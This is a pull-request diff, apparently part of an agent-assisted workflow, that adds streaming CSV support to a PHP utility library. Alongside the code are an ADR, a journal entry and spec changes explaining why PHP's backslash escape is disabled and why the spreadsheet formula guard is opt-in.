### PR TITLE
feat(support): streaming Csv with PHP's data-eating escape disabled

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,6 +12,20 @@ PR. A release PR moves the `[Unreleased]` entries into a new per-version file un
 
 ### Added
 
+- **`D4np\Utils\Support\Csv`, `Delimiter`, `CsvSerializable`, `CsvException`** and
+  **`File::writeStream()`** (spec r5 **FR-28/FR-29**, RFC-0002; roadmap item **9.4**;
+  **ADR-0037**) — streaming CSV whose memory cost is one row, written through the atomic
+  replacement of ADR-0005. **PHP's default backslash escape is disabled on every call**:
+  measured, it is not a formatting preference but data corruption — a field ending in a
+  backslash escapes the closing quote, so two fields go in and one comes back having
+  swallowed the delimiter and the newline. Two more shapes PHP cannot express are handled:
+  a single empty field is written as `""` (`fputcsv()` emits a bare newline, which is read
+  back as nothing and loses the row) and a zero-column row is refused. Blank lines are
+  skipped on read; a quoted empty field is not. `CsvSerializable`'s header/row pairing is
+  **enforced** rather than requested in prose. The **formula guard is opt-in, default off** —
+  it alters exported data, so it is a decision about where the file is going, and both
+  states are tested against the OWASP corpus.
+
 - **`D4np\Utils\Support\Url`** and **`InvalidUrlException`** (spec r4 **FR-27**, RFC-0002;
   roadmap item **9.3**; **ADR-0036**) — an immutable absolute-URL value: parse, inspect,
   recompose, compose queries. Three refusals, each a defect from the intake:

--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -23,7 +23,7 @@ items are additive either way, so the mapping shifts without rework.
   (M1 → `v0.1.0` … M7 → `v0.7.0`); the **1.0.0 decision is a dedicated post-M7
   API-freeze review**, not an automatic bump.
 - **Session journal:** see [`docs/journal/`](docs/journal/). Latest checkpoint:
-  [2026-08-06 — The parser that launders](docs/journal/2026/08/2026-08-06-url.md).
+  [2026-08-06 — The escape character that eats a row](docs/journal/2026/08/2026-08-06-csv.md).
 
 ## Model & effort routing (advisory)
 
@@ -634,10 +634,34 @@ surface (RFC-0002 FR-27…FR-32).
       `InvalidUrlException` joining the family — the completeness guard doing its job — and
       spec r3's exception enumeration, which had not anticipated the type, is amended to r4
       rather than left to drift.*
-- [ ] 9.4 `Csv` streaming write/read + `Delimiter` enum + `CsvSerializable`; typed failures
+- [x] 9.4 `Csv` streaming write/read + `Delimiter` enum + `CsvSerializable`; typed failures
       (never boolean), atomic write via `File`; formula-guard **opt-in, default off**, both
       flag states tested (RFC-0002 FR-28/FR-29; T-08) (security) — size: M ·
-      route: frontier-reasoning / extra · ADR (formula-guard default)
+      route: frontier-reasoning / extra *(run at standard tier; mismatch recorded)* ·
+      **ADR-0037**, **spec r5**. ***The probe found data corruption in the obvious
+      implementation.*** *PHP's CSV functions default to a backslash `$escape` that RFC 4180
+      does not define, and it does not merely format differently: a field ending in a
+      backslash escapes the closing quote, so `['ends with \', 'next']` comes back as **one**
+      field having swallowed the delimiter and the newline. Every call now passes
+      `escape: ''`; the native corruption is pinned by its own test beside the fix, so the
+      workaround cannot later read as arbitrary (PHP 8.4 deprecates the default for the same
+      reason). **Two more shapes `fputcsv()` cannot express**, both silent losses: a single
+      empty field emits a bare newline that reads back as nothing, so `""` is written
+      explicitly; and a zero-column row — which has no CSV representation at all — is refused
+      rather than written as a line that disappears. Blank lines are skipped on read, a
+      quoted empty field is not, and the distinction is asserted. **The formula guard stays
+      off by default**: it changes the exported value, so a guarded file no longer
+      round-trips — asserted as a test, because that cost is the reason the default is off
+      (spec §1). `CsvSerializable`'s pairing, which the estate's interface could only request
+      in prose, is enforced: header from the first item, every row checked against its width.
+      NFR-12's `memory O(row)` needed a streaming atomic write, so **`File` gains
+      `writeStream()`** rather than `Csv` reimplementing ADR-0005's discipline in a second
+      place — it adds `fflush()` before the rename, without which buffered bytes would make
+      the "complete or previous" promise a lie. 92 tests; **suite proved non-vacuous with 12
+      planted defects**, all caught. PHPStan also refused a `@throws` it could not trace
+      through the writer callback, which was fixed the honest way — `writeStream()` now
+      documents `@throws Throwable`, the propagation contract `Transaction::run()` already
+      had.*
 - [ ] 9.5 `FileSequence`: rolling lock-guarded counter with an explicit cap policy
       (`SequenceExhaustedException`, never a silent wrap) + T-14 multi-process concurrency
       suite (RFC-0002 FR-32; T-14) (severity:medium — concurrency/atomicity) — size: S ·

--- a/docs/adr/0037-disable-phps-escape-character-and-keep-the-formula-guard-opt-in.md
+++ b/docs/adr/0037-disable-phps-escape-character-and-keep-the-formula-guard-opt-in.md
@@ -1,0 +1,155 @@
+# ADR-0037: Disable PHP's CSV escape character, and keep the formula guard opt-in
+
+- **Status:** Accepted
+- **Date:** 2026-08-06
+- **Deciders:** maintainer (`@danielPoloWork`), agent acting as tech-lead
+- **Related:** ROADMAP item 9.4 · spec r5 FR-28, FR-29, FR-22/23, §6 T-08 ·
+  [RFC-0002](../rfc/0002-application-layer-groups-from-legacy-intake.md) §Cross-cutting (the
+  CSV guard clause) · [ADR-0005](0005-atomic-file-writes-with-a-sidecar-lock.md) (the atomic
+  write this streams through) · [ADR-0015](0015-identifier-allowlist-closed-keywords-and-the-anchor-hole.md)
+  (an enum over a validated string) ·
+  [ADR-0019](0019-four-escaping-contexts-and-the-unquoted-attribute-assumption.md) (do not
+  silently substitute what the caller supplied) ·
+  [ADR-0036](0036-refuse-the-downgrade-and-the-characters-parse-url-launders.md) (the
+  immediately preceding case of a standard-library function that succeeds while changing the
+  value)
+
+## Context
+
+FR-28 asks for streaming CSV with typed failures and an **opt-in** formula guard; FR-29 for a
+`CsvSerializable` contract. The estate's exporter is the anti-requirement: it resolved a
+separator *name* through a `match` with a `default => ';'` arm, returned `false` from four
+paths while accumulating the reason into a `$message` variable nothing ever read, and paired
+its header and row methods by asking implementors, in prose, to keep them consistent.
+
+Four behaviours were measured against PHP 8.3.1 before designing. **Two changed the
+implementation, and one of them is data corruption.**
+
+| probe | result |
+|---|---|
+| `fputcsv`/`fgetcsv` round trip of a field ending in a backslash, default `$escape` | **corrupted** — two fields in, **one** field out, having swallowed the delimiter and the newline |
+| the same round trip with `escape: ''` | exact |
+| `fputcsv($h, [''])` | writes a **bare newline**; `fgetcsv` reads it back as `[null]` — the row is lost |
+| `fgetcsv` on a blank line | `[null]`, a phantom single-column row |
+
+## Decision
+
+### 1. `escape: ''` on every call — the default corrupts data
+
+PHP's CSV functions default to a backslash escape character that **RFC 4180 does not
+define**. It is not a formatting preference. Measured:
+
+```
+['ends with \', 'next']  →  "ends with \",next␊   →  ['ends with ",next␊']
+```
+
+The backslash escapes the closing quote, the field never terminates, and it consumes the
+delimiter and the newline. Any value ending in a backslash — a Windows path, a regex, a
+trailing separator in free text — is silently destroyed on the round trip.
+
+Both `fputcsv()` and `fgetcsv()` are therefore called with `escape: ''`, leaving the
+quote-doubling of the actual standard as the only mechanism. This also aligns with PHP 8.4,
+which deprecates the default for the same reason. A test pins the **native** corruption
+alongside our fix, so the workaround cannot later look arbitrary.
+
+### 2. A single empty field is written as `""`, because `fputcsv()` cannot express it
+
+`fputcsv($h, [''])` emits a bare newline — indistinguishable from a blank line, and read
+back as nothing. A one-column export of possibly-empty values would lose rows silently.
+`Csv` writes the explicit `""` form for that one shape; `fputcsv()` never quotes an empty
+field and offers no flag to make it.
+
+The neighbouring case is refused rather than papered over: a **zero-column** row has no CSV
+representation at all, so it raises `CsvException` instead of being written as a line that
+disappears.
+
+### 3. Blank lines are skipped on read; `""` is not
+
+`fgetcsv()` reports a blank line as `[null]`. Yielding that would hand every consumer a
+phantom single-column row to filter. It is skipped — and the distinction is asserted: a line
+holding one *quoted empty field* is a real row and is yielded as `['']`.
+
+### 4. The formula guard is **off by default**
+
+Turning `=1+1` into `'=1+1` protects a spreadsheet, and it **changes the exported value** —
+the apostrophe is part of the field on any later read, so a guarded file no longer
+round-trips to its input. Making that the default would repeat the input-mutilation mistake
+spec §1 exists to reject (the `magic_quotes` shape, and ADR-0019's rule against substituting
+what the caller supplied).
+
+Whether the guard is wanted is a fact about **where the file is going**, which only the
+caller knows: a CSV consumed by another service must not be rewritten; a CSV a human will
+open in Excel should be. The flag is that decision, made explicitly.
+
+Both states are tested against the OWASP corpus, including the cost: a test asserts that a
+guarded file does **not** round-trip. Leaders are OWASP's `=`, `+`, `-`, `@`, plus tab and
+carriage return. Non-string fields are left alone — a negative integer is not an injection
+vector, and guarding it would corrupt legitimate numeric exports.
+
+### 5. `Delimiter` is an enum; `CsvSerializable`'s pairing is enforced
+
+The estate's separator `match` had a `default => ';'` arm, so a typo silently produced a
+different format than the caller believed. An enum makes the wrong value unrepresentable —
+ADR-0015's reasoning, reached from a third direction. Four cases, not the estate's eight:
+these are the separators real CSV uses.
+
+`CsvSerializable`'s two methods must agree in order and count, which its predecessor could
+only *request* in prose. `Csv::write()` takes the header from the first item and checks every
+subsequent row against its width, raising `CsvException` naming both counts. A docblock plea
+became a mechanism.
+
+### 6. `File::writeStream()` rather than a second atomic-write implementation
+
+NFR-12 requires memory proportional to a row, and `File::write()` takes a finished string.
+Rather than reimplement temp-file-plus-rename inside `Csv` — putting ADR-0005's discipline in
+two places, one of which would drift — `File` gains a streaming sibling that shares the lock,
+the same-directory temporary file, the mode-before-rename ordering and the cleanup.
+
+It adds `fflush()` before the rename: buffered bytes still in userland when the rename
+happens would make the "complete or previous, never a mix" promise a lie. It catches
+`Throwable` rather than `FileException`, because the caller's writer may throw anything and
+the temporary file must not survive either way — and it propagates the original unchanged,
+the same contract `Transaction::run()` documents.
+
+## Alternatives
+
+1. **Keep PHP's default escape** — rejected on the probe: it is not a style choice, it
+   destroys any field ending in a backslash.
+2. **Write the CSV to a string and use `File::write()`** — rejected: it buffers the whole
+   table, which NFR-12 forbids, and the estate's exporter already showed what happens when an
+   export outgrows memory.
+3. **Duplicate the atomic-write logic inside `Csv`** — rejected: ADR-0005's discipline is
+   security- and durability-relevant, and two copies is one copy that will drift.
+4. **Formula guard on by default** — rejected: silently altering exported data is the
+   `magic_quotes` shape spec §1 rejects, and it breaks the round trip the rest of this class
+   works to guarantee.
+5. **Quote every field unconditionally** (a common "just be safe" reflex) — rejected: it does
+   not stop formula injection at all (a spreadsheet evaluates `=1+1` whether or not the CSV
+   quoted it), while making every file larger and noisier. It would have looked like a fix.
+6. **A validated separator string instead of an enum** — rejected for the estate's own
+   evidence: the `default` arm turned a typo into a silently different format.
+7. **Yield blank lines as `[null]` and let callers filter** — rejected: every caller would
+   write the same filter, and the one that forgets gets a phantom row into its data.
+8. **A separator name (`'semicolon'`) as the public API**, as the estate had — rejected: it
+   is the enum's information with none of the enum's guarantees.
+
+## Consequences
+
+**Easier:** an export streams, so table size is bounded by disk rather than memory; a failed
+export leaves the previous file byte-for-byte intact; every failure names itself instead of
+returning `false`; and a value survives the round trip — including the backslash-terminated
+ones PHP's defaults destroy. `File::writeStream()` is available to item 9.5, which needs the
+same discipline for its counter file.
+
+**Harder / accepted:** `Csv` writes one shape (`""`) that plain `fputcsv()` would not, which
+a byte-comparison against another writer's output will notice; a zero-column row is now an
+error rather than a silent no-op; and the formula guard being off by default means a caller
+exporting to a spreadsheet **must** know to turn it on — the documentation says so at the
+parameter, and the alternative was worse.
+
+**Verification:** 92 tests across four suites, `#[Group('T-08')]` on the two the spec names,
+and the suite is **proved non-vacuous by 12 planted defects** — restoring PHP's escape on
+write and on read, removing the single-empty-field form, silently writing a zero-column row,
+flipping the guard default in both directions, dropping the tab/CR leaders, yielding blank
+lines, skipping the `CsvSerializable` width check, suppressing the header, leaving a
+temporary file behind on failure, and removing the pre-rename flush. Each was caught.

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -52,3 +52,4 @@ Status transitions: `Proposed` → `Accepted` → (`Superseded by ADR-XXXX` | `D
 | [0034](0034-whole-collection-readers-on-request.md) | Whole-collection readers on `Request`, because a key-scoped reader cannot enumerate | Accepted |
 | [0035](0035-guard-the-ref-shape-rather-than-trust-a-glob-and-never-skip-release-mode.md) | Guard the ref shape rather than trust a glob, and never skip release mode | Accepted |
 | [0036](0036-refuse-the-downgrade-and-the-characters-parse-url-launders.md) | Refuse the scheme downgrade, and refuse the characters `parse_url()` launders | Accepted |
+| [0037](0037-disable-phps-escape-character-and-keep-the-formula-guard-opt-in.md) | Disable PHP's CSV escape character, and keep the formula guard opt-in | Accepted |

--- a/docs/journal/2026/08/2026-08-06-csv.md
+++ b/docs/journal/2026/08/2026-08-06-csv.md
@@ -1,0 +1,86 @@
+# 2026-08-06 — The escape character that eats a row
+
+Roadmap item **9.4**, fourth in Milestone 9. Route `frontier-reasoning / extra`; run at
+standard tier — mismatch recorded. Second item running, after 9.3, where **the probe found
+the real defect and the named requirement turned out to be the smaller half.**
+
+## `escape: '\'` is not a formatting preference
+
+PHP's `fputcsv()`/`fgetcsv()` default to a backslash escape character that RFC 4180 does not
+define. Measured:
+
+```
+in:  ['ends with \', 'next']
+raw: "ends with \",next␊
+out: ['ends with ",next␊']          ← one field, not two
+```
+
+The backslash escapes the closing quote, so the field never terminates and consumes the
+delimiter and the newline behind it. Any value ending in a backslash — a Windows path, a
+regex, free text with a trailing separator — is destroyed on the round trip, silently, by
+the most obvious implementation of a CSV writer. `escape: ''` on both calls fixes it, and
+PHP 8.4 deprecates the default for the same reason.
+
+The native behaviour is pinned by its own test next to the fix. A workaround with no
+evidence beside it reads as superstition to the next maintainer.
+
+## Two shapes `fputcsv()` cannot express
+
+Both found by the same round-trip suite, both silent losses:
+
+- **A single empty field** writes as a bare newline. Read back, that is a blank line, and
+  the row is gone. A one-column export of possibly-empty values quietly loses rows. `Csv`
+  writes `""` explicitly — `fputcsv()` never quotes an empty field and has no flag to make
+  it.
+- **A zero-column row** has no CSV representation at all. Refused, rather than written as a
+  line that disappears.
+
+The neighbouring read decision: `fgetcsv()` reports a blank line as `[null]`, a phantom
+single-column row. Skipped — with a test asserting that a *quoted* empty field is still a
+real row, because that is the distinction the skip could easily blur.
+
+## The guard the requirement actually named
+
+FR-28's formula guard is the clause the item was filed for, and it is the least surprising
+part of the work. It stays **off by default**, and the test that matters asserts the cost:
+a guarded file no longer round-trips to its input. That is the whole argument — the guard
+alters exported data, so making it the default would repeat the input-mutilation mistake
+spec §1 exists to reject, and whether it is wanted is a fact about where the file is going
+that only the caller knows.
+
+Rejected while writing the ADR: "just quote every field", the reflex that looks like a fix.
+A spreadsheet evaluates `=1+1` whether or not the CSV quoted it.
+
+## Where the atomic write came from
+
+NFR-12 asks for memory proportional to a row; `File::write()` takes a finished string. The
+choice was to reimplement temp-file-plus-rename inside `Csv` or to give `File` a streaming
+sibling. Two copies of ADR-0005's discipline is one copy that will drift, so `File` gained
+`writeStream()` — sharing the lock, the same-directory temporary file, the mode-before-rename
+ordering and the cleanup, and adding `fflush()` before the rename, without which buffered
+bytes would make the "complete or previous, never a mix" promise a lie.
+
+## PHPStan refused a true `@throws`
+
+`Csv::write()` throws `CsvException` from inside the writer callback, which PHPStan cannot
+trace, so it called the tag unused. The tag was true, and suppressing the rule was not
+available. The honest fix was upstream: `File::writeStream()` now documents
+`@throws Throwable` — which it genuinely does, propagating whatever the writer threw — the
+same contract `Transaction::run()` has carried since item 4.3. A static-analysis complaint
+resolved by making a real contract explicit rather than by annotating around it.
+
+## Gates
+
+92 new tests across four suites (`#[Group('T-08')]` on the two the spec names); full suite
+1560 green. **Suite proved non-vacuous with 12 planted defects** — PHP's escape restored on
+write and on read, single-empty-field form removed, zero-column row written silently, guard
+default flipped in both directions, tab/CR leaders dropped, blank lines yielded, the
+`CsvSerializable` width check skipped, the header suppressed, the temp file left behind on
+failure, the pre-rename flush removed. All twelve caught. PHPStan max clean, CS-Fixer clean,
+deptrac 0/0, `composer normalize` clean, `consistency_lint` green, leak-gate zero.
+
+## Lesson
+
+When a requirement names a security feature, probe the plumbing underneath it first: FR-28
+asked for a formula guard, and the defect that would actually have shipped was a default
+escape character quietly eating a field.

--- a/docs/specs/01_spec_utils.md
+++ b/docs/specs/01_spec_utils.md
@@ -3,7 +3,7 @@
 > Rendered from the intake interview (Phase 5). Frozen contract: diverging implementation
 > updates this spec in the same PR or adds an ADR superseding the relevant section.
 
-**Revision r4** — 2026-08-06. See [Revision history](#revision-history).
+**Revision r5** — 2026-08-06. See [Revision history](#revision-history).
 
 ## 1. Objective & Business Context
 
@@ -31,7 +31,7 @@ Provide EGL PHP projects (framework-based and native/legacy) with a modern utili
 - FR-17 Logger: PSR-3 file/console logger
 - FR-18 ExceptionHandler: fatal-error capture, JSON problem responses for API calls; never leaks traces in production mode (env-gated)
 - FR-19..21 Str: slug() (transliteration via ext-intl when present), uuid() (v4 from random_bytes), random() (CSPRNG alphanumeric tokens)
-- FR-22..23 File: write()/read() flock-guarded, atomic write via temp+rename; mime() via Fileinfo (never trusts extensions)
+- FR-22..23 File: write()/read() flock-guarded, atomic write via temp+rename; writeStream() streams to the temp file under the same discipline, for producers whose output must not be buffered (r5, spec NFR-12); mime() via Fileinfo (never trusts extensions)
 - FR-24 Env::get(): env reads with correct boolean coercion ('false' -> false)
 - FR-25 Json: encode()/decode() with JSON_THROW_ON_ERROR; library JsonException wraps and rethrows PHP's native \JsonException (RFC-0001 R-7)
 - FR-26 Exception hierarchy: UtilsException <- DatabaseException, HydrationException (<- UnknownKeyException, TypeMismatchException, MissingKeyException), HttpException, FileException, JsonException
@@ -39,13 +39,14 @@ Provide EGL PHP projects (framework-based and native/legacy) with a modern utili
 **r3 addendum (RFC-0002)** — normative detail in
 [RFC-0002](../rfc/0002-application-layer-groups-from-legacy-intake.md); one error-model rule
 spans all of it: **no silent sentinel returns** — every new failure path throws a typed
-exception in the FR-26 hierarchy (new: InvalidUrlException, CsvException, SequenceExhaustedException,
+exception in the FR-26 hierarchy (new: InvalidUrlException, CsvException [added r5],
+SequenceExhaustedException,
 HttpClientException, RouteNotFoundException, MethodNotAllowedException, CryptoException,
 MailException).
 
 - FR-27 Url: parse/normalize/build value object; absolute URLs only; refuses C0/DEL control characters up front (parse_url() rewrites them to "_" rather than rejecting them — ADR-0036); refuses a scheme downgrade (https->http, wss->ws, ftps/sftp->ftp; an unknown target scheme is allowed through — recorded limit); query preserved byte-exact until edited, composed per RFC 3986, null values refused at any depth
-- FR-28 Csv + Delimiter enum: streaming write/read, typed failures (never boolean), atomic write via File; formula-guard opt-in (default off — input-mutilation lesson, spec §1)
-- FR-29 CsvSerializable: csvHeader()/csvRow() contract; reflective default documented via ClassMetadata
+- FR-28 Csv + Delimiter enum: streaming write/read (memory O(row)), typed failures (never boolean), atomic write via File::writeStream(); PHP's non-RFC-4180 backslash escape DISABLED on every call — the default corrupts any field ending in a backslash (ADR-0037); a single empty field is written as "" (fputcsv emits a bare newline, which is lost on read) and a zero-column row is refused; blank lines skipped on read, a quoted empty field is not; formula-guard opt-in (default off — input-mutilation lesson, spec §1), leaders = OWASP's `=` `+` `-` `@` plus tab and CR
+- FR-29 CsvSerializable: csvHeader()/csvRow() contract, with the pairing ENFORCED — Csv::write() takes the header from the first item and refuses any row whose width disagrees (ADR-0037)
 - FR-30 Lookup: immutable code→label map; label() throws on a missing key, labelOr()/tryLabel() tolerant
 - FR-31 Str additions: collapseWhitespace(), nullIfBlank(), transcode() (strict default, lossy opt-in), multibyte-safe padLeft()/padRight(), shortClassName(), pascalCase()
 - FR-32 FileSequence: rolling flock-guarded counter with an explicit cap (SequenceExhaustedException); never wraps silently
@@ -134,7 +135,7 @@ r3 (RFC-0002) additions:
 
 - D4np\Utils\Persistence\ — Repository (fetchAll/fetchOne/execute/withTransaction), TableGateway (select/insert/update/delete), RowNormalizer
 - D4np\Utils\Mail\ — EmailAddress, MailMessage, Mailer, NativeMailer
-- D4np\Utils\Database\ — + SqlStatement · D4np\Utils\Http\ — + HttpClient, Router, ApiEnvelope · D4np\Utils\Security\ — + Crypto, SecretKey · D4np\Utils\Errors\ — + Level, LevelFilteredLogger, MultiLogger, LoggerFactory · D4np\Utils\Support\ — + Url, Csv, Delimiter, CsvSerializable, Lookup, FileSequence, Str additions (FR-31)
+- D4np\Utils\Database\ — + SqlStatement · D4np\Utils\Http\ — + HttpClient, Router, ApiEnvelope · D4np\Utils\Security\ — + Crypto, SecretKey · D4np\Utils\Errors\ — + Level, LevelFilteredLogger, MultiLogger, LoggerFactory · D4np\Utils\Support\ — + Url, Csv, Delimiter, CsvSerializable, Lookup, FileSequence, File::writeStream(), Str additions (FR-31)
 
 
 ## 6. Verification & Test Strategy
@@ -161,6 +162,7 @@ non-functional requirement above maps to a CI gate (see [`.github/workflows/ci.y
 |-----|------|--------|
 | r1 | 2026-08-03 | Frozen from the imported `.specs/d4np-php.md` v2.0 via RFC-0001 (naming mapping A-7). |
 | r2 | 2026-08-05 | §6/T-03: the `hash_equals` **timing test** is replaced by a **mechanism assertion**. Rationale below; see [ADR-0027](../adr/0027-constant-time-comparison-is-asserted-by-mechanism-not-by-timing.md). |
+| r5 | 2026-08-06 | §2: FR-28/FR-29 stated to the precision item 9.4 implemented (PHP's backslash escape disabled, the single-empty-field and zero-column shapes, blank-line handling, the enforced header/row pairing, the guard's leader set); FR-22/23 gains `File::writeStream()`, without which a streaming CSV could not honour NFR-12; `CsvException` added to the exception enumeration. Additive; see [ADR-0037](../adr/0037-disable-phps-escape-character-and-keep-the-formula-guard-opt-in.md). |
 | r4 | 2026-08-06 | §2: FR-27 stated to the precision item 9.3 implemented (control-character refusal, absolute-only, the named downgrade pairs and their recorded limit, query preservation), and `InvalidUrlException` added to the r3 exception enumeration, which had not anticipated it. Additive; see [ADR-0036](../adr/0036-refuse-the-downgrade-and-the-characters-parse-url-launders.md). |
 | r3 | 2026-08-06 | §2–§6: the RFC-0002 surface — FR-27…FR-44, NFR-09…NFR-14, suites T-07…T-15, the Persistence/Mail groups and the two named layering edges. Additive; no existing requirement changed. Source: [RFC-0002](../rfc/0002-application-layer-groups-from-legacy-intake.md) (approved 2026-08-05, PR #49); roadmap: M9–M12. |
 

--- a/src/main/php/d4np/utils/Support/Csv.php
+++ b/src/main/php/d4np/utils/Support/Csv.php
@@ -1,0 +1,221 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Support;
+
+use Generator;
+
+/**
+ * Streaming CSV writing and reading (spec r3 FR-28/FR-29, RFC-0002; ADR-0037).
+ *
+ * Three decisions distinguish this from a `fputcsv()` loop.
+ *
+ * **RFC 4180 fidelity.** PHP's CSV functions default to a backslash escape character that
+ * RFC 4180 does not define, and it **corrupts data**: a field ending in a backslash writes
+ * as `"ends with \"` — where the backslash escapes the closing quote — and reads back as one
+ * unterminated field that swallows the rest of the line. Every call here passes
+ * `escape: ''`, so the quote-doubling of the actual standard is the only mechanism in play
+ * and a value survives the round trip (ADR-0037; the same reason PHP 8.4 deprecates the
+ * default).
+ *
+ * **Failures throw.** `fputcsv()` and `fopen()` report failure by return value, and the
+ * estate's exporter returned `false` from four different paths with the reason accumulated
+ * into a local `$message` variable that nothing ever read. Here every path raises
+ * {@see CsvException} or {@see FileException}.
+ *
+ * **Memory is proportional to a row.** {@see self::write()} consumes an `iterable`, so a
+ * generator streams; {@see self::read()} is itself a generator. Neither buffers the table
+ * (spec NFR-12).
+ */
+final class Csv
+{
+    /**
+     * Leading characters a spreadsheet may read as the start of a formula (OWASP's CSV
+     * Injection set, including the tab and carriage return that Excel also treats as
+     * formula-leading once the cell is parsed).
+     */
+    private const FORMULA_LEADERS = ['=', '+', '-', '@', "\t", "\r"];
+
+    /** Prefix that forces a spreadsheet to treat a cell as literal text. */
+    private const TEXT_PREFIX = "'";
+
+    private function __construct()
+    {
+        // Static-only: no instances.
+    }
+
+    /**
+     * Write `$rows` to `$path`, atomically and without buffering the table.
+     *
+     * Rows may be arrays of scalars, or {@see CsvSerializable} objects. When the **first**
+     * row is `CsvSerializable`, its `csvHeader()` is written first and every subsequent row
+     * is checked against that width — the pairing the interface promises, enforced instead of
+     * requested. Plain arrays are written as given: their shape is the caller's business.
+     *
+     * `$guardFormulas` prefixes any field beginning with a formula character with an
+     * apostrophe. It is **off by default**, deliberately: the guard alters exported data, and
+     * a library that silently rewrote values would be repeating the input-mutilation mistake
+     * spec §1 exists to reject. Turning it on is a decision about *where the file is going*,
+     * which only the caller knows (ADR-0037).
+     *
+     * @param iterable<array<array-key, scalar|null>|CsvSerializable> $rows
+     *
+     * @return int the number of data rows written, not counting a header
+     *
+     * @throws CsvException  if a row is empty or cannot be written, or a `CsvSerializable`
+     *                       row's width disagrees with the header
+     * @throws FileException if the file cannot be replaced atomically
+     */
+    public static function write(
+        string $path,
+        iterable $rows,
+        Delimiter $delimiter = Delimiter::Comma,
+        bool $guardFormulas = false,
+    ): int {
+        $written = 0;
+
+        File::writeStream($path, static function ($handle) use ($rows, $delimiter, $guardFormulas, &$written): void {
+            $headerWidth = null;
+
+            foreach ($rows as $row) {
+                if ($row instanceof CsvSerializable) {
+                    if ($headerWidth === null) {
+                        $header = $row->csvHeader();
+                        $headerWidth = \count($header);
+                        self::putRow($handle, $header, $delimiter, $guardFormulas);
+                    }
+
+                    $values = $row->csvRow();
+                    if (\count($values) !== $headerWidth) {
+                        throw new CsvException(sprintf(
+                            '%s produced %d value(s) for a %d-column header. csvHeader() and '
+                            . 'csvRow() must agree, in order and in count.',
+                            $row::class,
+                            \count($values),
+                            $headerWidth,
+                        ));
+                    }
+
+                    self::putRow($handle, $values, $delimiter, $guardFormulas);
+                } else {
+                    self::putRow($handle, $row, $delimiter, $guardFormulas);
+                }
+
+                $written++;
+            }
+        });
+
+        return $written;
+    }
+
+    /**
+     * Read `$path` row by row.
+     *
+     * A generator, so a file larger than memory is readable; nothing is buffered beyond the
+     * current row. Entirely blank lines are skipped rather than yielded: `fgetcsv()` reports
+     * one as `[null]`, a phantom single-column row that every consumer would have to filter.
+     * A line holding one *quoted empty field* (`""`) is a real row and is yielded as `['']`.
+     *
+     * @return Generator<int, list<string|null>>
+     *
+     * @throws FileException if the path is not a readable file
+     * @throws CsvException  if reading fails part-way through
+     */
+    public static function read(string $path, Delimiter $delimiter = Delimiter::Comma): Generator
+    {
+        if (!is_file($path)) {
+            throw new FileException(sprintf('Cannot read "%s": not a file.', $path));
+        }
+
+        $handle = @fopen($path, 'rb');
+        if ($handle === false) {
+            throw new FileException(sprintf('Cannot read "%s": failed to open for reading.', $path));
+        }
+
+        try {
+            while (true) {
+                $row = fgetcsv($handle, 0, $delimiter->value, '"', '');
+
+                if ($row === false) {
+                    if (!feof($handle)) {
+                        throw new CsvException(sprintf('Reading "%s" failed before the end of the file.', $path));
+                    }
+
+                    return;
+                }
+
+                // fgetcsv() reports a blank line as [null] — not a row.
+                if ($row === [null]) {
+                    continue;
+                }
+
+                yield $row;
+            }
+        } finally {
+            @fclose($handle);
+        }
+    }
+
+    /**
+     * @param resource $handle
+     * @param array<array-key, scalar|null> $row
+     *
+     * @throws CsvException
+     */
+    private static function putRow($handle, array $row, Delimiter $delimiter, bool $guardFormulas): void
+    {
+        $fields = array_values($row);
+
+        if ($fields === []) {
+            throw new CsvException(
+                'A CSV row must have at least one field. A zero-column row has no '
+                . 'representation in CSV — it would be written as a blank line and read back '
+                . 'as nothing.',
+            );
+        }
+
+        if ($guardFormulas) {
+            $fields = array_map(self::guard(...), $fields);
+        }
+
+        // A row of exactly one empty field is the one shape `fputcsv()` cannot express: it
+        // emits a bare newline, which is indistinguishable from a blank line and therefore
+        // vanishes on read — measured, and a silent row loss. The explicit empty-field form
+        // is written instead; `fputcsv()` never quotes an empty field, and there is no flag
+        // to make it (ADR-0037).
+        if (\count($fields) === 1 && (string) ($fields[0] ?? '') === '') {
+            if (@fwrite($handle, "\"\"\n") === false) {
+                throw new CsvException('Failed to write a CSV row.');
+            }
+
+            return;
+        }
+
+        // escape: '' — see the class docblock and ADR-0037. Not a stylistic choice: the
+        // default corrupts any field ending in a backslash.
+        if (@fputcsv($handle, $fields, $delimiter->value, '"', '') === false) {
+            throw new CsvException('Failed to write a CSV row.');
+        }
+    }
+
+    /**
+     * Neutralize a leading formula character by prefixing an apostrophe, which spreadsheets
+     * read as "this cell is text".
+     *
+     * Applied only when the caller opted in. Note that it **changes the value**: the
+     * apostrophe is part of the field on any subsequent read, so a guarded file no longer
+     * round-trips to its input. That is the cost the opt-in buys, and the reason it is not
+     * the default.
+     */
+    private static function guard(string|int|float|bool|null $field): string|int|float|bool|null
+    {
+        if (!is_string($field) || $field === '') {
+            return $field;
+        }
+
+        return in_array($field[0], self::FORMULA_LEADERS, true)
+            ? self::TEXT_PREFIX . $field
+            : $field;
+    }
+}

--- a/src/main/php/d4np/utils/Support/CsvException.php
+++ b/src/main/php/d4np/utils/Support/CsvException.php
@@ -1,0 +1,17 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Support;
+
+/**
+ * A CSV document could not be written or read.
+ *
+ * Distinct from {@see FileException}, which reports why the *file* could not be touched:
+ * this one reports why its *contents* could not be produced or consumed — a row whose width
+ * disagrees with the header a {@see CsvSerializable} declared, or a failed field write. A
+ * consumer that wants either treats them coarsely through {@see UtilsException}.
+ */
+final class CsvException extends UtilsException
+{
+}

--- a/src/main/php/d4np/utils/Support/CsvSerializable.php
+++ b/src/main/php/d4np/utils/Support/CsvSerializable.php
@@ -1,0 +1,32 @@
+<?php
+
+declare(strict_types=1);
+
+namespace D4np\Utils\Support;
+
+/**
+ * An object that knows how to become a CSV header and a CSV row (spec r3 FR-29, RFC-0002).
+ *
+ * The pairing is the whole point. The estate's version of this interface asked implementors,
+ * in prose, to "maintain strict consistency" between the two methods — a plea a docblock
+ * cannot enforce, and the two drift the first time a property is added to one and not the
+ * other. {@see Csv::write()} emits the header from the **first** item and then checks every
+ * row against its width, so a mismatch is a `CsvException` naming both counts rather than a
+ * misaligned export nobody notices until a spreadsheet is already wrong.
+ */
+interface CsvSerializable
+{
+    /**
